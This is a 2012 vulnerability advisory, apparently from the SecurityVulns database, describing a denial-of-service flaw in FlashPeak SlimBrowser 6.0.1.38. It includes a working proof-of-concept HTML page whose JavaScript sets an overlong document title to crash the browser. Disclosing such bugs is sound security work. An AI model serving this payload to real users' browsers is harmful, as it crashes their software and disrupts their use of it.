FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability

2012-05-24T00:00:00
ID SECURITYVULNS:DOC:28093
Type securityvulns
Reporter Securityvulns
Modified 2012-05-24T00:00:00

Description

Title: FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability Software : FlashPeak SlimBrowser

Software Version : 6.0.1.38

Vendor: FlashPeak Inc.(www.flashpeak.com/)

Vulnerability Published : 2012-05-16

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description : FlashPeak SlimBrowser is a web browser Software for FREE. FlashPeak SlimBrowser contains one denial of service vulnerability about surfing a html file has a long web TITLE by remote or locality.

Proof Of Concept :

<html> <head> <title>evil page</title> <body bgcolor="black"> <script type="text/javascript"> function a7(){ var buffer = ""; for (var i = 0; i < 1011; i++) { buffer += "A"; } document.title = buffer; } </script> </head> <body> <font color="white"> <h5>==> <a href="javascript:a7();">'A'x1011</a> <==</h5><br> <font> </body> </html>


Credits : This vulnerability was discovered by demonalex(at)163(dot)com mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk Pentester/Researcher Dark2S Security Team/PolyU.HK